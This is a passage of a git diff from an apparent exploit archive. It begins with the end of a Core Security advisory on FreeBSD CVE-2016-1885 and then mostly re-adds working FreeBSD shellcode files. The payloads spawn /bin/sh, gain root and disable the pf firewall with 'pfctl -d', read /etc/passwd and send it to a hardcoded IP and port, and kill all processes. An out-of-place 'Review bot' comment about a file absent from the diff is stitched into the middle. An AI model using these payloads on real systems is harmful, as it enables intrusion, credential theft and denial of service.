advisory in order to coordinate a publication date. +2016-03-11: Core Security asked FreeBSD if they were able to review and verify the reported issue. We additionally requested an estimated date for releasing the fix/update. +2016-03-11: FreeBSD informed us they were going to release the update in the middle of the following week. +2016-03-11: Core Security asked FreeBSD if they had the specific date and time they were going to release the update. We additionally requested a CVE identifier for the vulnerability considering they are registered as a CNA. 
+2016-03-11: FreeBSD informed us they would probably release it on Wednesday 16th of March and that they assigned the CVE-2016-1885 ID. +2016-03-16: Advisory CORE-2016-0005 published. +10. References + +[1] https://www.freebsd.org/cgi/man.cgi?query=i386_set_ldt&sektion=2&manpath=FreeBSD+8.2-RELEASE +[2] https://svnweb.freebsd.org/base/release/10.2.0/sys/amd64/amd64/sys_machdep.c?view=markup +[3] https://svnweb.freebsd.org/base/release/10.2.0/sys/x86/include/sysarch.h?view=markup + +11. About CoreLabs + +CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. + +12. About Core Security Technologies + +Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. + +Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. + +13. 
Disclaimer
+
+The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
+
+14. PGP/GPG Keys
+
+This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
+
+*/
\ No newline at end of file
diff --git a/platforms/freebsd_x86-64/shellcode/13279.c b/platforms/freebsd_x86-64/shellcode/13279.c
index 07a005fd5..14536a484 100755
--- a/platforms/freebsd_x86-64/shellcode/13279.c
+++ b/platforms/freebsd_x86-64/shellcode/13279.c
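Review bot: The result of the second `i386_set_ldt(1, NULL, 0x80000000)` call at the end of main() in 39570.c is stored in `res` but never examined, and main() then falls off its end, so on a kernel that carries the fix (where the advisory text says the signed comparison no longer lets the call reach bzero() and it should instead fail) the program reports nothing either way. Reporting the outcome, e.g. `printf("i386_set_ldt returned %d (errno %d)\n", res, errno);`, would let the same file double as a regression check that a patched release is installed, which is the defensive use of a DoS proof of concept; the first call already routes its failure through err(), so the second call's silence is also inconsistent with the file's own style. The hunk's `#include` lines show no header names on this page, so whether <errno.h> is already among them cannot be told from here.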
@@ -1,56 +1,56 @@ -/** - * - * _ _ _ ____ _ _ - * | | | | __ _ ___| | ___ __ | _ \ ___ | | | - * | |_| |/ _` |/ __| |/ / '_ \ | |_) / _ \| | | - * | _ | (_| | (__| <| | | | | _ < (_) | | | - * |_| |_|\__,_|\___|_|\_\_| |_| |_| \_\___/|_|_| - * [ http://www.hacknroll.com ] - * - * Description: - * FreeBSD x86-64 exec("/bin/sh") Shellcode - 31 bytes - * - * - * - * Authors: - * Maycon M. Vitali ( 0ut0fBound ) - * Milw0rm .: http://www.milw0rm.com/author/869 - * Page ....: http://maycon.hacknroll.com - * Email ...: maycon@hacknroll.com - * - * Anderson Eduardo ( c0d3_z3r0 ) - * Milw0rm .: http://www.milw0rm.com/author/1570 - * Page ....: http://anderson.hacknroll.com - * Email ...: anderson@hacknroll.com - * - * ------------------------------------------------------- - * - * amd64# gcc hacknroll.c -o hacknroll - * amd64# ./hacknroll - * # exit - * amd64# - * - * ------------------------------------------------------- - */ - -const char shellcode[] = - "\x48\x31\xc0" // xor %rax,%rax - "\x99" // cltd - "\xb0\x3b" // mov $0x3b,%al - "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi - "\x48\xc1\xef\x08" // shr $0x8,%rdi - "\x57" // push %rdi - "\x48\x89\xe7" // mov %rsp,%rdi - "\x57" // push %rdi - "\x52" // push %rdx - "\x48\x89\xe6" // mov %rsp,%rsi - "\x0f\x05"; // syscall - -int main(void) -{ - (*(void (*)()) shellcode)(); - return 0; -} - - +/** + * + * _ _ _ ____ _ _ + * | | | | __ _ ___| | ___ __ | _ \ ___ | | | + * | |_| |/ _` |/ __| |/ / '_ \ | |_) / _ \| | | + * | _ | (_| | (__| <| | | | | _ < (_) | | | + * |_| |_|\__,_|\___|_|\_\_| |_| |_| \_\___/|_|_| + * [ http://www.hacknroll.com ] + * + * Description: + * FreeBSD x86-64 exec("/bin/sh") Shellcode - 31 bytes + * + * + * + * Authors: + * Maycon M. 
Vitali ( 0ut0fBound ) + * Milw0rm .: http://www.milw0rm.com/author/869 + * Page ....: http://maycon.hacknroll.com + * Email ...: maycon@hacknroll.com + * + * Anderson Eduardo ( c0d3_z3r0 ) + * Milw0rm .: http://www.milw0rm.com/author/1570 + * Page ....: http://anderson.hacknroll.com + * Email ...: anderson@hacknroll.com + * + * ------------------------------------------------------- + * + * amd64# gcc hacknroll.c -o hacknroll + * amd64# ./hacknroll + * # exit + * amd64# + * + * ------------------------------------------------------- + */ + +const char shellcode[] = + "\x48\x31\xc0" // xor %rax,%rax + "\x99" // cltd + "\xb0\x3b" // mov $0x3b,%al + "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi + "\x48\xc1\xef\x08" // shr $0x8,%rdi + "\x57" // push %rdi + "\x48\x89\xe7" // mov %rsp,%rdi + "\x57" // push %rdi + "\x52" // push %rdx + "\x48\x89\xe6" // mov %rsp,%rsi + "\x0f\x05"; // syscall + +int main(void) +{ + (*(void (*)()) shellcode)(); + return 0; +} + + // milw0rm.com [2009-05-18] \ No newline at end of file diff --git a/platforms/freebsd_x86-64/shellcode/13280.c b/platforms/freebsd_x86-64/shellcode/13280.c index 2fe81a26a..60bf68b67 100755 --- a/platforms/freebsd_x86-64/shellcode/13280.c +++ b/platforms/freebsd_x86-64/shellcode/13280.c 
@@ -1,63 +1,63 @@ - /* -Anderson Eduardo < c0d3_z3r0 > -Hack'n Roll -http://anderson.hacknroll.com -http://blog.hacknroll.com - -.section .text -.globl _start -_start: - - - xor %rcx,%rcx - jmp string - - main: - - popq %rsi - movq %rsi,%rdi - - pushq %rsi - pushq %rcx - movq %rsp,%rsi - - movq %rcx,%rdx - movb $0x3b,%al - syscall - - string: - callq main - .string "/bin/sh" - - -*/ - -int main(void) -{ -char shellcode[] = -"\x48\x31\xc9" -"\xeb\x10" -"\x5e" -"\x48\x89\xf7" -"\x56" -"\x51" -"\x48\x89\xe6" -"\x48\x89\xca" -"\xb0\x3b" -"\x0f\x05" -"\x48\xe8\xea\xff\xff\xff" -"\x2f" -"\x62" -"\x69" -"\x6e" -"\x2f" -"\x73\x68"; - - (*(void (*)()) shellcode)(); - -//Hack'n Roll - -return 0; -} - + /* +Anderson Eduardo < c0d3_z3r0 > +Hack'n Roll +http://anderson.hacknroll.com +http://blog.hacknroll.com + +.section .text +.globl _start +_start: + + + xor %rcx,%rcx + jmp string + + main: + + popq %rsi + movq %rsi,%rdi + + pushq %rsi + pushq %rcx + movq %rsp,%rsi + + movq %rcx,%rdx + movb $0x3b,%al + syscall + + string: + callq main + .string "/bin/sh" + + +*/ + +int main(void) +{ +char shellcode[] = +"\x48\x31\xc9" +"\xeb\x10" +"\x5e" +"\x48\x89\xf7" +"\x56" +"\x51" +"\x48\x89\xe6" +"\x48\x89\xca" +"\xb0\x3b" +"\x0f\x05" +"\x48\xe8\xea\xff\xff\xff" +"\x2f" +"\x62" +"\x69" +"\x6e" +"\x2f" +"\x73\x68"; + + (*(void (*)()) shellcode)(); + +//Hack'n Roll + +return 0; +} + // milw0rm.com [2009-05-15] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13261.txt b/platforms/freebsd_x86/shellcode/13261.txt index 70191f797..567f34cc5 100755 --- a/platforms/freebsd_x86/shellcode/13261.txt +++ b/platforms/freebsd_x86/shellcode/13261.txt 
@@ -1,43 +1,43 @@ -/* - -ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 - -c0d3_z3r0 < anderson_underground@hotmail.com ; andersonc0d3@gmail.com > - -http://anderson.hacknroll.com -http://blog.hacknroll.com - -\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00 -\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00 -\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00 -\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08 -\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00 -\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08 -\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00 -\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 -\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44 - -c0d3labs# uname -p -i386 -c0d3labs# perl -e 'print "\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44"' > binary -c0d3labs# ./binary -# exit -c0d3labs# objdump -d binary -objdump: binary: File truncated -c0d3labs# gdb -q binary -"/usr/home/andersonc0d3/elf/binary": not in executable format: File truncated -(gdb) q -c0d3labs# file binary -binary: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped -c0d3labs# - -c0d3labs64# uname -p -amd64 -c0d3labs64# perl -e 'print 
"\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44"' > binary64 -c0d3labs64# ./binary64 -# exit -c0d3labs64# - -*/ - +/* + +ELF - FreeBSD Execve /bin/sh - Anti-Debugging - i386/AMD64 + +c0d3_z3r0 < anderson_underground@hotmail.com ; andersonc0d3@gmail.com > + +http://anderson.hacknroll.com +http://blog.hacknroll.com + +\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00 +\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00 +\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00 +\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08 +\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00 +\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08 +\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00 +\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 +\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44 + +c0d3labs# uname -p +i386 +c0d3labs# perl -e 'print 
"\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44"' > binary +c0d3labs# ./binary +# exit +c0d3labs# objdump -d binary +objdump: binary: File truncated +c0d3labs# gdb -q binary +"/usr/home/andersonc0d3/elf/binary": not in executable format: File truncated +(gdb) q +c0d3labs# file binary +binary: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, stripped +c0d3labs# + +c0d3labs64# uname -p +amd64 +c0d3labs64# perl -e 'print "\x7f\x45\x4c\x46\x01\x01\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x74\x80\x04\x08\x34\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\x8b\x00\x00\x00\x8b\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x8c\x00\x00\x00\x8c\x90\x04\x08\x8c\x90\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x44"' > binary64 +c0d3labs64# ./binary64 +# exit +c0d3labs64# + +*/ + # milw0rm.com [2009-04-13] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13262.txt b/platforms/freebsd_x86/shellcode/13262.txt index aeca64be6..3063076e2 100755 --- a/platforms/freebsd_x86/shellcode/13262.txt +++ b/platforms/freebsd_x86/shellcode/13262.txt 
@@ -1,71 +1,71 @@ - ***(C)oDed bY suN8Hclf*** - DaRk-CodeRs Group production, kid - [FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes] - -The simples way to disable the FreeBSD's packet filter. We do not -flush all rules (pfctl -F all) but only turn the firewall off. - -Assembly code: --------------------------code.asm-------------------------- -section .text -global _start - -_start: - - xor eax, eax - push eax - push eax - mov al, 126 - push eax - int 0x80 ; setreuid() - - xor eax, eax - push eax - push word 0x642d - mov ecx, esp ; ecx contains a pointer to "-d" string - - push eax - push 0x6c746366 - push 0x702f6e69 - push 0x62732f2f - mov ebx, esp ; ebx contains a pointer to "//sbin/pfctl" string - - push eax - push ecx - push ebx - mov ecx, esp - - push eax - push ecx - push ebx - mov al, 0x3b - push eax - int 0x80 ; execve() - - xor eax, eax - push eax - push eax - int 0x80 ; exit() --------------------------code.asm-------------------------- -And C code: --------------------------code.c---------------------------- -#include - -char shellcode[]= -"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x31\xc0\x50\x66\x68\x2d\x64" -"\x89\xe1\x50\x68\x66\x63\x74\x6c\x68\x69\x6e\x2f\x70\x68\x2f\x2f" -"\x73\x62\x89\xe3\x50\x51\x53\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd" -"\x80\x31\xc0\x50\x50\xcd\x80"; - -int main(int argc, char *argv[]){ - int (*func)(); - func=(int (*)())shellcode; - (int)(*func)(); -} --------------------------code.c---------------------------- - -Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!, - Katharsis, doctor and many others... -Visit us : www.dark-coders.pl - + ***(C)oDed bY suN8Hclf*** + DaRk-CodeRs Group production, kid + [FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes] + +The simples way to disable the FreeBSD's packet filter. We do not +flush all rules (pfctl -F all) but only turn the firewall off. 
+ +Assembly code: +-------------------------code.asm-------------------------- +section .text +global _start + +_start: + + xor eax, eax + push eax + push eax + mov al, 126 + push eax + int 0x80 ; setreuid() + + xor eax, eax + push eax + push word 0x642d + mov ecx, esp ; ecx contains a pointer to "-d" string + + push eax + push 0x6c746366 + push 0x702f6e69 + push 0x62732f2f + mov ebx, esp ; ebx contains a pointer to "//sbin/pfctl" string + + push eax + push ecx + push ebx + mov ecx, esp + + push eax + push ecx + push ebx + mov al, 0x3b + push eax + int 0x80 ; execve() + + xor eax, eax + push eax + push eax + int 0x80 ; exit() +-------------------------code.asm-------------------------- +And C code: +-------------------------code.c---------------------------- +#include + +char shellcode[]= +"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x31\xc0\x50\x66\x68\x2d\x64" +"\x89\xe1\x50\x68\x66\x63\x74\x6c\x68\x69\x6e\x2f\x70\x68\x2f\x2f" +"\x73\x62\x89\xe3\x50\x51\x53\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd" +"\x80\x31\xc0\x50\x50\xcd\x80"; + +int main(int argc, char *argv[]){ + int (*func)(); + func=(int (*)())shellcode; + (int)(*func)(); +} +-------------------------code.c---------------------------- + +Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!, + Katharsis, doctor and many others... +Visit us : www.dark-coders.pl + # milw0rm.com [2008-09-12] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13263.txt b/platforms/freebsd_x86/shellcode/13263.txt index 68925ccb3..5c94c255e 100755 --- a/platforms/freebsd_x86/shellcode/13263.txt +++ b/platforms/freebsd_x86/shellcode/13263.txt 
@@ -1,133 +1,133 @@ - ***(C)oDed bY suN8Hclf*** - DaRk-CodeRs Group production, kid - [FreeBSD x86 connect back.send.exit /etc/passwd 112 bytes] - -This is the FreeBSD version of 0in's shellcode (http://milw0rm.com/shellcode/6263) -(really learnt a lot while coding this one ;]) - -Compile: -nasm -f elf shellcode.asm -ld -e _start -o shellcode shellcode.o -================================================================================ -How it works: -1st terminal: $nc -l 8000 -2nd terminal: $./shellcode -2nd terminal: -# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ -# -root:*:0:0:Charlie &:/root:/bin/csh -toor:*:0:0:Bourne-again Superuser:/root: -daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin -operator:*:2:5:System &:/:/usr/sbin/nologin -bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin -tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin -kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin -games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin -news:*:8:8:News Subsystem:/:/usr/sbin/nologin -man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin -sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin -smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin -mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin -bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin -[..] 
-================================================================================ -Code: --------------------------code.asm--------------------- -section .text -global _start - -_start: -xor eax, eax -push byte 0x64 -push word 0x7773 -push 0x7361702f -push 0x6374652f ;file to open (default:/etc/passwd) -mov ebx, esp -push eax -push ebx -mov al, 5 ;use: 'cat /usr/src/sys/kern/syscalls.master | grep *' to get the right numbers -push eax -int 0x80 ;open() - -mov ebx, eax ;file descriptor to ebx -xor eax, eax ;we should clean eax each time we return from int 0x80 -xor ecx, ecx - -mov cx, 3333 ;3333 bytes is probably enough -push ecx -mov esi, esp ;put our data on the stack -push esi -push ebx -mov al, 3 -push eax -int 0x80 ;read() - -mov ebp, eax -xor eax, eax -mov al, 6 -push ebx -push eax -int 0x80 ;close() - -xor eax, eax -push eax -push byte 0x01 -push byte 0x02 -mov al, 97 -push eax -int 0x80 ;socket() - -mov edx, eax ;socket descriptor to edx - -push 0x2101a8c0 ;192.168.1.33, change IT!!! 
-push 0x401f02AA ;port 8000 -mov eax, esp - -push byte 0x10 -push eax -push edx -xor eax, eax -mov al, 98 -push eax -int 0x80 ;connect() - -xor eax, eax -push ebp -push esi ;our buffer with data -push edx -mov al, 4 -push eax -int 0x80 ;write() - -xor eax, eax -inc eax -push eax -push eax -int 0x80 ;exit() --------------------------code.asm--------------------- - -C Code: --------------------------code.c----------------------- -#include - -char shellcode[]= -"\x31\xc0\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63" -"\x89\xe3\x50\x53\xb0\x05\x50\xcd\x80\x89\xc3\x31\xc0\x31\xc9\x66\xb9\x05" -"\x0d\x51\x89\xe6\x56\x53\xb0\x03\x50\xcd\x80\x89\xc5\x31\xc0\xb0\x06\x53" -"\x50\xcd\x80\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" -"\x68\xc0\xa8\x01\x21" //<- host address -"\x68\xaa\x02\x1f\x40" // <- port number -"\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc0\x55\x56\x52" -"\xb0\x04\x50\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80"; - -int main(int argc, char **argv) { - int (*func)(); - func=(int (*)())shellcode; - (int)(*func)(); -} --------------------------code.c----------------------- - -Greetz to: 0in, cOndemned, e.wiZz!, str0ke, doctor -Visit us : www.dark-coders.pl - + ***(C)oDed bY suN8Hclf*** + DaRk-CodeRs Group production, kid + [FreeBSD x86 connect back.send.exit /etc/passwd 112 bytes] + +This is the FreeBSD version of 0in's shellcode (http://milw0rm.com/shellcode/6263) +(really learnt a lot while coding this one ;]) + +Compile: +nasm -f elf shellcode.asm +ld -e _start -o shellcode shellcode.o +================================================================================ +How it works: +1st terminal: $nc -l 8000 +2nd terminal: $./shellcode +2nd terminal: +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin 
+bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +[..] +================================================================================ +Code: +-------------------------code.asm--------------------- +section .text +global _start + +_start: +xor eax, eax +push byte 0x64 +push word 0x7773 +push 0x7361702f +push 0x6374652f ;file to open (default:/etc/passwd) +mov ebx, esp +push eax +push ebx +mov al, 5 ;use: 'cat /usr/src/sys/kern/syscalls.master | grep *' to get the right numbers +push eax +int 0x80 ;open() + +mov ebx, eax ;file descriptor to ebx +xor eax, eax ;we should clean eax each time we return from int 0x80 +xor ecx, ecx + +mov cx, 3333 ;3333 bytes is probably enough +push ecx +mov esi, esp ;put our data on the stack +push esi +push ebx +mov al, 3 +push eax +int 0x80 ;read() + +mov ebp, eax +xor eax, eax +mov al, 6 +push ebx +push eax +int 0x80 ;close() + +xor eax, eax +push eax +push byte 0x01 +push byte 0x02 +mov al, 97 +push eax +int 0x80 ;socket() + +mov edx, eax ;socket descriptor to edx + +push 0x2101a8c0 ;192.168.1.33, change IT!!! 
+push 0x401f02AA ;port 8000 +mov eax, esp + +push byte 0x10 +push eax +push edx +xor eax, eax +mov al, 98 +push eax +int 0x80 ;connect() + +xor eax, eax +push ebp +push esi ;our buffer with data +push edx +mov al, 4 +push eax +int 0x80 ;write() + +xor eax, eax +inc eax +push eax +push eax +int 0x80 ;exit() +-------------------------code.asm--------------------- + +C Code: +-------------------------code.c----------------------- +#include + +char shellcode[]= +"\x31\xc0\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63" +"\x89\xe3\x50\x53\xb0\x05\x50\xcd\x80\x89\xc3\x31\xc0\x31\xc9\x66\xb9\x05" +"\x0d\x51\x89\xe6\x56\x53\xb0\x03\x50\xcd\x80\x89\xc5\x31\xc0\xb0\x06\x53" +"\x50\xcd\x80\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" +"\x68\xc0\xa8\x01\x21" //<- host address +"\x68\xaa\x02\x1f\x40" // <- port number +"\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc0\x55\x56\x52" +"\xb0\x04\x50\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80"; + +int main(int argc, char **argv) { + int (*func)(); + func=(int (*)())shellcode; + (int)(*func)(); +} +-------------------------code.c----------------------- + +Greetz to: 0in, cOndemned, e.wiZz!, str0ke, doctor +Visit us : www.dark-coders.pl + # milw0rm.com [2008-09-10] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13264.txt b/platforms/freebsd_x86/shellcode/13264.txt index c784ed442..293381703 100755 --- a/platforms/freebsd_x86/shellcode/13264.txt +++ b/platforms/freebsd_x86/shellcode/13264.txt 
@@ -1,45 +1,45 @@ - ***(C)oDed bY suN8Hclf*** - DaRk-CodeRs Group productions, kid - [FreeBSD x86 kill all procesess 12 bytes shellcode] - - -Compile: -nasm -f elf code.asm -ld -e _start -o code code.o - -Assembly code: ----------------------code.asm------------------- -section .text -global _start - -_start: -xor eax, eax -push byte 9 ; SIGKILL -dec eax -push eax ; -1 (0xffffffff) -inc eax -mov al, 37 ;kill() syscall number, check /usr/src/sys/kern/syscalls.master for details -push eax -int 0x80 ----------------------code.asm------------------- - -And C code: ----------------------code.c--------------------- -#include - -char shellcode[]= -"\x31\xc0\x6a\x09\x48\x50\x40\xb0\x25\x50\xcd\x80"; - -int main() -{ -int (*func)(); -func=(int (*)())shellcode; -(int)(*func)(); -} ----------------------code.c--------------------- - - -Greetz: all DaRk-CodeRs guys, e.wiZz!, doctor -Visit : www.dark-coders.pl - + ***(C)oDed bY suN8Hclf*** + DaRk-CodeRs Group productions, kid + [FreeBSD x86 kill all procesess 12 bytes shellcode] + + +Compile: +nasm -f elf code.asm +ld -e _start -o code code.o + +Assembly code: +---------------------code.asm------------------- +section .text +global _start + +_start: +xor eax, eax +push byte 9 ; SIGKILL +dec eax +push eax ; -1 (0xffffffff) +inc eax +mov al, 37 ;kill() syscall number, check /usr/src/sys/kern/syscalls.master for details +push eax +int 0x80 +---------------------code.asm------------------- + +And C code: +---------------------code.c--------------------- +#include + +char shellcode[]= +"\x31\xc0\x6a\x09\x48\x50\x40\xb0\x25\x50\xcd\x80"; + +int main() +{ +int (*func)(); +func=(int (*)())shellcode; +(int)(*func)(); +} +---------------------code.c--------------------- + + +Greetz: all DaRk-CodeRs guys, e.wiZz!, doctor +Visit : www.dark-coders.pl + # milw0rm.com [2008-09-09] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13265.c b/platforms/freebsd_x86/shellcode/13265.c index 892f5864b..b40c85e30 100755 
